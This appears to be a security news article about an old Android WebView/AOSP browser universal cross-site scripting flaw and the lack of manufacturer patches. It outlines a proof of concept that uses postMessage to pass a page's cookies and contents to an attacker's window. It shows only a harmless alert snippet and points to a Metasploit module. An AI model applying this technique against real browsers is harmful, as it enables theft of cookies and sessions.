Legacy Android bug leaves billions of smart phone and tablets exposedUniversal Cross-scripting VulnerabilityDrawback of being Open SourceProof of ConceptProof Of Concept Using Postmessage CallVulnerable Code

Universal Cross-scripting Vulnerability

The vulnerability, which affects the WebView component, occurs “when replacing the ‘data’ attribute of a given HTML object with a JavaScript URL scheme,” explained Tod Beardsley, technical lead for the Metasploit framework. An attacker can leverage the UXSS flaw to scrape cookie data and page contents from a vulnerable browser window, Rapid7 said. The company has noted that target URLs using X-Frame-Options are not affected. The security hole can be exploited on all versions of the Android Open Source Platform (AOSP) browser, including those using WebView.

Drawback of being Open Source

Google did release a patch for this flaw. However, a major drawback of the way the Android community works is that it is upto the manufactures to propagate updates to its users- which a majority of them do not bother to do. This is felt when Google releases new versions of Android and the pinch is also being felt now. Since most manufacturers may not bother with the update, millions who are using an older version of android are left stuck with this vulnerability for ever, unless they buy a new handset which comes with the latest version of Android 5.0 lollipop. But these users generally belong to the lower mid and mid range segment and cannot not afford the latest handset in the first place, so buying a new handset isn’t really an option for them. “For many, many people, buying a new phone just isn’t practical; the people who are most likely affected by ‘legacy’ Android bugs are the same people who couldn’t afford a fancy ‘latest’ Android handset in the first place,” Beardsley said in a blog post. “In other words, it looks like a billion phones aren’t going to see this patch any time soon, if ever. It’s nice that the patch exists, but Google doesn’t seem to have any practical way of getting it out to the world.”

Proof of Concept

The following is the proof of concept: The POC is very easy to understand for individuals having some javaScript background. However, for the uninitiated, Rafay has given following breakup

Proof Of Concept Using Postmessage Call

The following POC uses postMessage call from HTML 5 world to send the document.cookie and innerHTML to the main window.

Vulnerable Code

Rafay has also given the vulnerable code which is reproduced below : window.onmessage = function(m){ alert(m.data); } – IF you are a security researcher or a white hat hacker, you can download the Metasploit for UXSS of Android browsers from here. Do remember use the Metasploit only if you are familiar with it. Other PoCs and the fix has been given by Rafay on his blog given below. Resource : Rafay Hacking Articles